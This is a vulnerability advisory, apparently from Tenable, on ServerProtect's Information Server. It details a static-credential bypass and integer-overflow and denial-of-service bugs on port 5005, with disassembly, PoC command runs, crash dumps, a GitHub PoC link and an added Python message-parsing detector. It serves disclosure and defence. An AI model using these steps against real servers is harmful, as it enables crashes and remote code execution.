Trend Micro ServerProtect Multiple Vulnerabilities
Critical
Synopsis
While researching CVE-2021-36745 for Nessus plugin coverage, Tenable found multiple vulnerabilities in Trend Micro ServerProtect for Microsoft Windows/NetWare 5.8 build 1575.
1) Information Server Static Credential - CVE-2022-25329
(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
The Information Server (EarthAgent.exe) uses a static credential to authenticate a client console when it handles a command 2 (CMD_REGISTER) message. An unauthenticated remote attacker can use this credential to register/log in to the server and perform any action permitted for a registered/authenticated client console. A Wireshark stream capture showed a successful client console registration using this credential.
2) Information Server Command 73730 Integer Overflow - CVE-2022-25330
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Command 73730, sent to TCP port 5005 of the Information Server, retrieves the list of Normal Servers registered on a remote Windows host by querying the remote registry under HKLM\SOFTWARE\WOW6432Node\TrendMicro\ServerProtect\CurrentVersion\InformationServer\<domain>\<normal_server_name>. The command specifies the hostname/IP of the remote host, the credentials to use on that host, and the maximum number of Normal Servers to retrieve. The command has the following form:

// le32 = 32-bit integer in little-endian byte order
struct header {
    le32 magic;     // must be 0x87654321
    le32 cmd;       // command
    le32 error;     // error code, used in responses
    le32 unk;       // number of items
    le32 len;       // message length, including this header
    le32 cport;     // console port, used together with the client IP
                    // to identify the client console
    byte unk[4];
};

struct cmd_73730 {
    header hdr;           // hdr.cmd must be 73730
    byte rhost[56];       // remote Windows host
    byte username[128];   // credentials to access the
    byte password[128];   // registry on the remote host
    le32 max_cnt;         // max number of Normal Servers to get
};
An integer overflow occurs when EarthAgent.exe uses the attacker-supplied max_cnt to allocate the heap buffer that will hold the data retrieved from the registry of the host named in the command:

EarthAgent.exe 5.80.0.1575
<snip...>
.text:004321D3 lea     edx, [esp+2A4h+arg_hdr.max_cnt]
.text:004321DA push    ebx
.text:004321DB push    edx
.text:004321DC push    73730
.text:004321E1 mov     ecx, esi
.text:004321E3 call    obj30_RetrieveDataFromBuffer  ; returns true/false
.text:004321E8 test    eax, eax
.text:004321EA jz      loc_4324D0
.text:004321F0 mov     eax, [esp+2A4h+arg_hdr.max_cnt] ; attacker-controlled
.text:004321F7 lea     ecx, ds:0[eax*8]
.text:004321FE sub     ecx, eax
.text:00432200 shl     ecx, 3                        ; max_cnt * 56 -> int32 overflow!
.text:00432203 push    ecx
.text:00432204 call    operator new(uint)
<snip...>

A large max_cnt (e.g., 0x04924925) produces a tiny heap buffer (i.e., (0x04924925 * 56) & 0xffffffff = 0x18).
By exploiting vulnerability 1), an unauthenticated remote attacker can place his/her own Windows host, credentials that grant access to it, and a large max_cnt in a command 73730 message and send it to TCP port 5005 of the ServerProtect Information Server host. This can cause a heap-based buffer overflow in EarthAgent.exe, because a large number of attacker-controlled Normal Server names read from the remote registry are copied into the small heap buffer. The result may be process termination or remote code execution.
PoC:

python3 serverprotect_info_server_cmd_73730_int32_overflow.py -t <target> -p 5005 -P <admin_password> -- <attacker-win-host> -u Administrator
registered client console OK
sending crafted command 73730 message
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 119, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 22, in recv_msg
    data = recvall(sock, 0x1c)
  File "/work/0day/serverprotect_info_server_cmd_73730_int32_overflow.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

Below is the heap corruption resulting from the heap buffer overflow:

(1e60.ee8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=010b35e0 ecx=00004141 edx=00004141 esi=00004141 edi=010b0000
eip=772ceb37 esp=0356f7fc ebp=0356f9bc iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlpAllocateHeap+0x397:
772ceb37 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
0:017> k
 # ChildEBP RetAddr
00 0356f9bc 772ce5f0 ntdll!RtlpAllocateHeap+0x397
01 0356fa60 772cd35e ntdll!RtlpAllocateHeapInternal+0x1280
02 0356fa7c 771f87c0 ntdll!RtlAllocateHeap+0x3e
03 0356fa9c 009b38d6 msvcrt!malloc+0x90
WARNING: Stack unwind information not available. Following frames may be wrong.
04 0356fab4 00a068d1 MFC42u!Ordinal823+0x17
05 00000000 00000000 MFC42u!Ordinal6135+0x
3) Information Server Command 36885 Integer Overflow - CVE-2022-25330
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
An integer overflow condition exists in EarthAgent.exe when it processes a command 36885 message. By exploiting vulnerability 1), an unauthenticated remote attacker can crash the process, or possibly achieve remote code execution, by sending a specially crafted command 36885 message to TCP port 5005.
The following shows the vulnerability:

EarthAgent.exe 5.80.0.1575
<snip...>
.text:0042CAA2 add     eax, 760h            ; attacker-controlled eax
.text:0042CAA2                              ; int32 overflow if eax >= 0xfffff8a0
.text:0042CAA7 cmp     eax, 989680h
.text:0042CAAC mov     dword ptr [esp+11B8h+allocSize], eax
.text:0042CAB0 ja      loc_42CBFA
.text:0042CAB6 push    eax
.text:0042CAB7 call    operator new(uint)
.text:0042CABC mov     ebx, eax             ; int32 overflow -> small heap buffer
.text:0042CABC                              ; allocated
.text:0042CABE add     esp, 4
.text:0042CAC1 test    ebx, ebx
.text:0042CAC3 jz      loc_42CBFA
.text:0042CAC9 mov     ecx, dword ptr [esp+11B8h+allocSize]
.text:0042CACD xor     eax, eax
.text:0042CACF mov     edx, ecx
.text:0042CAD1 mov     edi, ebx
.text:0042CAD3 shr     ecx, 2
.text:0042CAD6 rep stosd
.text:0042CAD8 mov     ecx, edx
.text:0042CADA                              ; 0x768 bytes are copied into the small
.text:0042CADA                              ; heap buffer -> heap corruption,
.text:0042CADA                              ; RCE possible?
.text:0042CADA push    768h
.text:0042CADF and     ecx, 3
.text:0042CAE2 rep stosb
.text:0042CAE4 lea     eax, [esp+11BCh+Src] ; 0xc4 bytes of the source are
.text:0042CAE4                              ; attacker-controlled
.text:0042CAEB push    eax
.text:0042CAEC push    ebx
.text:0042CAED call    ds:memmove
<snip...>
PoC:

python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 36885
connection 1
registered client console OK
sending crafted command 36885 message
connection 2
registered client console OK
sending crafted command 36885 message
connection 3
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msg
    data = recvall(sock, 0x1c)
  File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

Below is the heap corruption resulting from the heap buffer overflow:

0:015> g
(6bc.1f60): C++ EH exception - code e06d7363 (first chance)
(6bc.1f60): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=011645f0 ebx=00000000 ecx=00000000 edx=00000000 esi=41414141 edi=02a1f848
eip=41414141 esp=02a1f61c ebp=02a1f648 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???
0:005> k
 # ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
00 02a1f618 771eb826 0x41414141
01 02a1f648 771eb7e5 msvcrt!terminate+0x26
02 02a1f678 771eaf94 msvcrt!_inconsistency+0x2c
03 02a1f6d4 771eb5b8 msvcrt!FindHandler+0x3db
04 02a1f708 771ec1b6 msvcrt!__InternalCxxFrameHandler+0xf7
05 02a1f744 77316482 msvcrt!__CxxFrameHandler+0x26
06 02a1f768 77316454 ntdll!ExecuteHandler2+0x26
07 02a1f830 77303a06 ntdll!ExecuteHandler+0x24
08 02a1f830 74a335e2 ntdll!KiUserExceptionDispatcher+0x26
09 02a1fd54 771eb8f8 KERNELBASE!RaiseException+0x62
0a 02a1fd98 00a31401 msvcrt!_CxxThrowException+0x68
0b 02a1fdac 00a38831 MFC42u!Ordinal1259
0c 02a1fdb0 00a38858 MFC42u!Ordinal1198+0x5
0d 02a1fdc8 004164e3 MFC42u!Ordinal1167+0x24
0e 02a1fe98 74a21e76 EarthAgent+0x164e3
0f 02a1fec0 ffffffff KERNELBASE!CloseHandle+0x26
10 02a1ff30 77217e71 0xffffffff
11 02a1ff68 77217f31 msvcrt!_callthreadstartex+0x25
12 02a1ff70 75190419 msvcrt!_threadstartex+0x61
13 02a1ff80 772f72fd KERNEL32!BaseThreadInitThunk+0x19
14 02a1ffdc 772f72cd ntdll!__RtlUserThreadStart+0x2f
15 02a1ffec 00000000 ntdll!_RtlUserThreadStart+0x1b
4) Information Server Command DoS - CVE-2022-25331
(CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)
An uncaught C++ exception is thrown by operator new in EarthAgent.exe when the requested allocation size is very large. By exploiting vulnerability 1), an unauthenticated remote attacker can crash the process by sending a crafted command message to TCP port 5005.
The following commands are affected: 4098, 8221, 8222, 8226, 12308, 12309, 36867, 36869, 36898, 41010, 41014, 65549.
The following shows the vulnerability for command 4098:

EarthAgent.exe 5.80.0.1575
<snip...>
.text:00423579 lea     ecx, ds:0[eax*8]
.text:00423580 mov     [esp+64Ch+arg_hdr.max_cnt], eax
.text:00423587 sub     ecx, eax
.text:00423589 shl     ecx, 3                 ; x 56
.text:0042358C push    ecx                    ; attacker-controlled allocation size,
.text:0042358C                                ; unhandled exception -> DoS
.text:0042358D call    operator new(uint)
<snip...>
PoC:

python3 serverprotect_info_server_dos.py -t <target> -p 5005 -c 4098
connection 1
registered client console OK
sending crafted command 4098 message
connection 2
registered client console OK
sending crafted command 4098 message
connection 3
registered client console OK
sending crafted command 4098 message
connection 4
Traceback (most recent call last):
  File "/work/0day/serverprotect_info_server_dos.py", line 144, in <module>
    r = read_msg(s)
  File "/work/0day/serverprotect_info_server_dos.py", line 40, in read_msg
    msg = recv_msg(sock)
  File "/work/0day/serverprotect_info_server_dos.py", line 22, in recv_msg
    data = recvall(sock, 0x1c)
  File "/work/0day/serverprotect_info_server_dos.py", line 12, in recvall
    packet = sock.recv(n - len(data))
ConnectionResetError: [Errno 104] Connection reset by peer

See the serverprotect_info_server_dos.py PoC script for details.
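As an added illustration (not code from the advisory, from Tenable's PoC scripts, or from Trend Micro), the following Python decodes the 0x1c-byte header and command 73730 body described in 2) and models the two allocation-size computations from 2), 3) and 4): the 56-byte multiply (commands 73730 and 4098) and the +0x760 add followed by the 0x989680 bounds check (command 36885), so a reviewer or a protocol monitor can flag a message whose size wraps in 32 bits. Field names follow the struct above; the sample messages are constructed here and are not captured traffic.

```python
import struct

# Header from the advisory: magic, cmd, error, unk, len, cport, unk[4] (0x1c bytes)
HEADER_FMT = "<IIIIII4s"
HEADER_LEN = struct.calcsize(HEADER_FMT)          # 28 == 0x1c, what recvall() reads first
MAGIC = 0x87654321
CMD_LIST_NORMAL_SERVERS = 73730
BODY_73730_FMT = "<56s128s128sI"                  # rhost, username, password, max_cnt
ENTRY_SIZE = 56                                   # factor produced by the lea/sub/shl sequence
MASK32 = 0xFFFFFFFF

def alloc_size_x56(max_cnt):
    """32-bit size computed for commands 73730 and 4098: (max_cnt*8 - max_cnt) << 3."""
    return (max_cnt * ENTRY_SIZE) & MASK32

def x56_wraps(max_cnt):
    """True when the real requirement exceeds what the truncated 32-bit size can hold."""
    return max_cnt * ENTRY_SIZE > MASK32

def cmd36885_alloc(n):
    """Command 36885 path: size = n + 0x760 (32-bit), then 'ja' rejects size > 0x989680.
    Returns (size, passes_check, wrapped); a wrapped size is tiny, so it passes the check."""
    size = (n + 0x760) & MASK32
    return size, size <= 0x989680, (n + 0x760) > MASK32

def parse_message(data):
    """Decode a header and, for command 73730, the body; flag a wrapping max_cnt."""
    if len(data) < HEADER_LEN:
        raise ValueError("short header")
    magic, cmd, error, _unk, length, cport, _ = struct.unpack_from(HEADER_FMT, data)
    if magic != MAGIC:
        raise ValueError("bad magic 0x%08x" % magic)
    if length != len(data):
        raise ValueError("declared len %d != %d bytes" % (length, len(data)))
    msg = {"cmd": cmd, "error": error, "len": length, "cport": cport}
    if cmd == CMD_LIST_NORMAL_SERVERS:
        rhost, _user, _pw, max_cnt = struct.unpack_from(BODY_73730_FMT, data, HEADER_LEN)
        msg["rhost"] = rhost.split(b"\0", 1)[0].decode("ascii", "replace")
        msg["max_cnt"] = max_cnt
        msg["alloc_size"] = alloc_size_x56(max_cnt)
        msg["suspicious"] = x56_wraps(max_cnt)
    return msg

def sample_73730_message(rhost, max_cnt, cport=1000):
    """Constructed test input (not a captured message): a well-formed command 73730 request."""
    body = struct.pack(BODY_73730_FMT, rhost, b"user", b"pass", max_cnt)
    hdr = struct.pack(HEADER_FMT, MAGIC, CMD_LIST_NORMAL_SERVERS, 0, 0,
                      HEADER_LEN + len(body), cport, b"\0" * 4)
    return hdr + body
```

A message whose max_cnt wraps (alloc_size far smaller than max_cnt * 56) is never legitimate, since no Windows host has millions of Normal Servers, so it is a safe thing to alert on.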
Solution
Proof of Concept
https://github.com/tenable/poc/blob/master/TrendMicro/ServerProtect/serverprotect_info_server_dos.py